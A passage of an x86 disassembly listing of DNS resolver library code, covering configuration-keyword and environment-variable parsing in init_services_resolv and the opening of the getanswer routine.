ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804AF88 push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AF88 cmp byte ptr [ebx+2], 0 jz short loc_804AF76 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AF88 loc_804AF76: ; CODE XREF: init_services_resolv+58Cj mov dword_8078514, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AF88: ; CODE XREF: init_services_resolv+572j ; init_services_resolv+586j ... mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804AFD4 push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AFD4 cmp byte ptr [ebx+3], 0 jz short loc_804AFC3 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AFD4 loc_804AFC3: ; CODE XREF: init_services_resolv+5D9j mov dword_8078514, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AFD4: ; CODE XREF: init_services_resolv+5BFj ; init_services_resolv+5D3j ... push offset aNospoof ; "nospoof" jmp loc_804B261 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AFE0: ; CODE XREF: init_services_resolv+528j ; init_services_resolv+547j ... 
push offset aNospoof ; "nospoof" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AFEC: ; CODE XREF: init_services_resolv+4EAj ; init_services_resolv+50Aj push 5 push offset aAlert ; "alert" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B130 cmp [ebp+var_3FB], 0 jz short loc_804B02C movzx edx, [ebp+var_3FB] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B130 loc_804B02C: ; CODE XREF: init_services_resolv+63Bj push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B124 cmp byte ptr [ebx], 0 jz short loc_804B06E mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804B058: ; CODE XREF: init_services_resolv+694j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804B06E inc ebx jz loc_804B124 cmp byte ptr [ebx], 0 jnz short loc_804B058 loc_804B06E: ; CODE XREF: init_services_resolv+675j ; init_services_resolv+688j test ebx, ebx jz loc_804B124 cmp byte ptr [ebx], 0 jz loc_804B124 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804B0CC push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B0CC cmp byte ptr [ebx+2], 0 jz short loc_804B0BA movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B0CC loc_804B0BA: ; CODE XREF: init_services_resolv+6D0j mov dword_8078518, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B0CC: ; CODE XREF: init_services_resolv+6B6j ; init_services_resolv+6CAj ... 
mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804B118 push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B118 cmp byte ptr [ebx+3], 0 jz short loc_804B107 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B118 loc_804B107: ; CODE XREF: init_services_resolv+71Dj mov dword_8078518, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B118: ; CODE XREF: init_services_resolv+703j ; init_services_resolv+717j ... push offset aAlert ; "alert" jmp loc_804B261 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B124: ; CODE XREF: init_services_resolv+66Cj ; init_services_resolv+68Bj ... push offset aAlert ; "alert" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B130: ; CODE XREF: init_services_resolv+62Ej ; init_services_resolv+64Ej push 7 push offset aReorder ; "reorder" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B2C8 cmp [ebp+var_3F9], 0 jz short loc_804B170 movzx edx, [ebp+var_3F9] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B2C8 loc_804B170: ; CODE XREF: init_services_resolv+77Fj push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jz short loc_804B1B2 mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804B19C: ; CODE XREF: init_services_resolv+7D8j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804B1B2 inc ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jnz short loc_804B19C loc_804B1B2: ; CODE XREF: init_services_resolv+7B9j ; init_services_resolv+7CCj test ebx, ebx jz loc_804B2BC cmp byte ptr [ebx], 0 jz loc_804B2BC mov edi, ebx xor al, al cld mov 
ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804B210 push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B210 cmp byte ptr [ebx+2], 0 jz short loc_804B1FE movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B210 loc_804B1FE: ; CODE XREF: init_services_resolv+814j mov dword_807851C, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B210: ; CODE XREF: init_services_resolv+7FAj ; init_services_resolv+80Ej ... mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804B25C push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B25C cmp byte ptr [ebx+3], 0 jz short loc_804B24B movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B25C loc_804B24B: ; CODE XREF: init_services_resolv+861j mov dword_807851C, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B25C: ; CODE XREF: init_services_resolv+847j ; init_services_resolv+85Bj ... push offset aReorder ; "reorder" loc_804B261: ; CODE XREF: init_services_resolv+4BDj ; init_services_resolv+601j ... mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push ebx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov ecx, dword_8078F9C push ecx call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 1Ch jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B2BC: ; CODE XREF: init_services_resolv+7B0j ; init_services_resolv+7CFj ... 
push offset aReorder ; "reorder" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B2C8: ; CODE XREF: init_services_resolv+772j ; init_services_resolv+792j push 4 push offset aTrim ; "trim" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804B3CC cmp [ebp+var_3FC], 0 jz short loc_804B308 movzx edx, [ebp+var_3FC] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804B3CC loc_804B308: ; CODE XREF: init_services_resolv+917j cmp dword_8078520, 3 jg loc_804AA5C push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804B390 jmp short loc_804B335 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B334: ; CODE XREF: init_services_resolv+960j ; init_services_resolv+965j inc ebx loc_804B335: ; CODE XREF: init_services_resolv+957j cmp byte ptr [ebx], 20h jz short loc_804B334 cmp byte ptr [ebx], 9 jz short loc_804B334 cmp byte ptr [ebx], 0 jz short loc_804B390 push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B390: ; CODE XREF: init_services_resolv+955j ; init_services_resolv+96Aj push offset aTrim ; "trim" loc_804B395: ; CODE XREF: init_services_resolv+4C9j ; init_services_resolv+60Dj ... mov eax, [ebp+var_40C] push eax push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... 
push 0Ch push 0Bh mov ecx, dword_8078F9C push ecx loc_804B3AC: ; CODE XREF: init_services_resolv+19Ej call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 10h jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B3CC: ; CODE XREF: init_services_resolv+90Aj ; init_services_resolv+92Aj push offset asc_806791B ; " \t" mov eax, [ebp+var_410] push eax call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804B3E9 mov byte ptr [ebx], 0 loc_804B3E9: ; CODE XREF: init_services_resolv+A0Cj mov ecx, [ebp+var_410] push ecx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 0Ch jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B41C: ; CODE XREF: init_services_resolv+A3j mov ds:dword_8079DD4[esi*4], 0 mov ecx, [ebp+var_404] push ecx call fclose add esp, 4 loc_804B436: ; CODE XREF: init_services_resolv+70j push offset aResolv_serv_or ; "RESOLV_SERV_ORDER" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B542 xor esi, esi push offset asc_8067950 ; " ,;:" push ebx call strtok mov ebx, eax add esp, 8 test ebx, ebx jz loc_804B542 nop loc_804B468: ; CODE XREF: init_services_resolv+B59j push 4 push offset aBind ; "bind" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B4B0 cmp byte ptr [ebx+4], 0 jz short loc_804B492 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B4B0 loc_804B492: ; CODE XREF: init_services_resolv+AA8j mov ds:dword_8079DD4[esi*4], 1 inc esi test byte ptr dword_807854C, 1 jnz short loc_804B51E call res_init jmp short loc_804B51E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B4B0: ; CODE XREF: init_services_resolv+AA2j ; 
init_services_resolv+AB8j push 5 push offset aHosts ; "hosts" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B4E8 cmp byte ptr [ebx+5], 0 jz short loc_804B4DA movzx edx, byte ptr [ebx+5] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B4E8 loc_804B4DA: ; CODE XREF: init_services_resolv+AF0j mov ds:dword_8079DD4[esi*4], 2 jmp short loc_804B51D ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B4E8: ; CODE XREF: init_services_resolv+AEAj ; init_services_resolv+B00j push 3 push offset aNis ; "nis" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B51E cmp byte ptr [ebx+3], 0 jz short loc_804B512 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B51E loc_804B512: ; CODE XREF: init_services_resolv+B28j mov ds:dword_8079DD4[esi*4], 3 loc_804B51D: ; CODE XREF: init_services_resolv+B0Dj inc esi loc_804B51E: ; CODE XREF: init_services_resolv+ACDj ; init_services_resolv+AD4j ... push offset asc_8067950 ; " ,;:" push 0 call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz loc_804B468 mov ds:dword_8079DD4[esi*4], 0 loc_804B542: ; CODE XREF: init_services_resolv+A6Fj ; init_services_resolv+A89j push offset aResolv_spoof_c ; "RESOLV_SPOOF_CHECK" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B626 push 4 push offset aWarn ; "warn" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B59C cmp byte ptr [ebx+4], 0 jz short loc_804B583 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B59C loc_804B583: ; CODE XREF: init_services_resolv+B99j mov dword_8078514, 1 mov dword_8078518, 1 jmp loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B59C: ; CODE XREF: init_services_resolv+B93j ; init_services_resolv+BA9j push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B5DC cmp byte ptr [ebx+3], 0 jz short loc_804B5C6 movzx edx, byte ptr 
[ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B5DC loc_804B5C6: ; CODE XREF: init_services_resolv+BDCj mov dword_8078514, 0 mov dword_8078518, 0 jmp short loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B5DC: ; CODE XREF: init_services_resolv+BD6j ; init_services_resolv+BECj push 8 push offset aWarnOff ; "warn off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B61C cmp byte ptr [ebx+8], 0 jz short loc_804B606 movzx edx, byte ptr [ebx+8] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B61C loc_804B606: ; CODE XREF: init_services_resolv+C1Cj mov dword_8078514, 1 mov dword_8078518, 0 jmp short loc_804B626 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B61C: ; CODE XREF: init_services_resolv+C16j ; init_services_resolv+C2Cj mov dword_8078514, 1 loc_804B626: ; CODE XREF: init_services_resolv+B7Bj ; init_services_resolv+BBFj ... push offset aResolv_multi ; "RESOLV_MULTI" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B67A push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B670 cmp byte ptr [ebx+2], 0 jz short loc_804B663 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B670 loc_804B663: ; CODE XREF: init_services_resolv+C79j mov dword_8078510, 1 jmp short loc_804B67A ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B670: ; CODE XREF: init_services_resolv+C73j ; init_services_resolv+C89j mov dword_8078510, 0 loc_804B67A: ; CODE XREF: init_services_resolv+C5Fj ; init_services_resolv+C95j push offset aResolv_reorder ; "RESOLV_REORDER" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B6CE push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804B6C4 cmp byte ptr [ebx+2], 0 jz short loc_804B6B7 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804B6C4 
loc_804B6B7: ; CODE XREF: init_services_resolv+CCDj mov dword_807851C, 1 jmp short loc_804B6CE ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B6C4: ; CODE XREF: init_services_resolv+CC7j ; init_services_resolv+CDDj mov dword_807851C, 0 loc_804B6CE: ; CODE XREF: init_services_resolv+CB3j ; init_services_resolv+CE9j push offset aResolv_add_tri ; "RESOLV_ADD_TRIM_DOMAINS" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz short loc_804B74F push offset asc_8067950 ; " ,;:" push ebx jmp short loc_804B741 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B6EC: ; CODE XREF: init_services_resolv+D75j cmp dword_8078520, 3 jg short loc_804B73A push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 loc_804B73A: ; CODE XREF: init_services_resolv+D1Bj push offset asc_8067950 ; " ,;:" push 0 loc_804B741: ; CODE XREF: init_services_resolv+D0Fj call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz short loc_804B6EC loc_804B74F: ; CODE XREF: init_services_resolv+D07j push offset aResolv_overrid ; "RESOLV_OVERRIDE_TRIM_DOMAINS" call secure_getenv mov ebx, eax add esp, 4 test ebx, ebx jz loc_804B7E7 mov dword_8078520, 0 mov [ebp+var_408], offset unk_807A358 push offset asc_8067950 ; " ,;:" push ebx jmp short loc_804B7D9 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804B784: ; CODE XREF: init_services_resolv+E0Dj cmp dword_8078520, 3 jg short loc_804B7D2 push ebx mov eax, [ebp+var_408] push eax call strcpy mov eax, [ebp+var_408] mov ecx, dword_8078520 mov ds:dword_807A348[ecx*4], eax inc dword_8078520 mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx add [ebp+var_408], edx add esp, 8 
loc_804B7D2: ; CODE XREF: init_services_resolv+DB3j push offset asc_8067950 ; " ,;:" push 0 loc_804B7D9: ; CODE XREF: init_services_resolv+DA8j call strtok mov ebx, eax add esp, 8 test ebx, ebx jnz short loc_804B784 loc_804B7E7: ; CODE XREF: init_services_resolv+D88j mov dword_80784F8, 1 lea esp, [ebp+var_420] pop ebx pop esi pop edi mov esp, ebp pop ebp retn init_services_resolv endp ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 栩栩栩栩栩栩栩 S U B R O U T I N E 栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩栩 ; Attributes: bp-based frame hidden getanswer proc near ; CODE XREF: gethostbyname+180p ; gethostbyaddr+105p var_144 = byte ptr -144h var_138 = dword ptr -138h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = dword ptr -128h var_124 = dword ptr -124h var_120 = dword ptr -120h var_11C = dword ptr -11Ch var_118 = dword ptr -118h var_114 = dword ptr -114h var_110 = dword ptr -110h var_10C = dword ptr -10Ch var_108 = dword ptr -108h var_104 = byte ptr -104h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 138h push edi push esi push ebx mov [ebp+var_12C], 0 mov eax, [ebp+arg_8] mov [ebp+var_130], eax mov ds:dword_8079E74, 0 mov edx, [ebp+arg_0] add edx, [ebp+arg_4] mov [ebp+var_108], edx mov eax, [ebp+arg_0] mov ax, [eax+6] xchg al, ah movzx edx, ax mov [ebp+var_120], edx mov eax, [ebp+arg_0] mov ax, [eax+4] xchg al, ah mov [ebp+var_10C], offset unk_8079F14 mov [ebp+var_11C], 401h mov esi, [ebp+arg_0] add esi, 0Ch cmp ax, 1 jz short loc_804B880 mov ds:dword_807E788, 3 jmp loc_804BE9E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B880: ; CODE XREF: getanswer+6Ej mov edx, [ebp+var_11C] push edx mov eax, [ebp+var_10C] push eax push esi mov edx, [ebp+var_108] push edx mov eax, [ebp+arg_0] push eax call sub_804D02C mov ebx, eax add esp, 14h test ebx, ebx jge short loc_804B8B8 mov ds:dword_807E788, 3 jmp loc_804BE9E ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804B8B8: ; CODE 
XREF: getanswer+A6j call sub_805E954 lea esi, [esi+ebx+4] cmp [ebp+arg_10], 1 jnz short loc_804B8FF xor cl, cl mov edi, [ebp+var_10C] mov al, cl cld mov ecx, 0FFFFFFFFh repne scasb mov ebx, ecx not ebx mov edx, [ebp+var_10C] mov ds:dword_8079E74, edx add edx, ebx mov [ebp+var_10C], edx sub [ebp+var_11C], ebx mov eax, ds:dword_8079E74 mov [ebp+arg_8], eax loc_804B8FF: ; CODE XREF: getanswer+C5j mov [ebp+var_110], offset dword_8079E88 mov ds:dword_8079E88, 0 mov ds:dword_8079E78, offset dword_8079E88 mov [ebp+var_114], offset dword_8079DE4 mov ds:dword_8079DE4, 0 mov ds:dword_8079E84, offset dword_8079DE4 mov [ebp+var_124], 0 mov [ebp+var_128], 0 mov eax, [ebp+var_120] dec [ebp+var_120] test eax, eax jle loc_804BE14 cmp [ebp+var_108], esi jbe loc_804BE14 nop loc_804B970: ; CODE XREF: getanswer+60Ej mov edx, [ebp+var_11C] push edx mov eax, [ebp+var_10C] push eax push esi mov edx, [ebp+var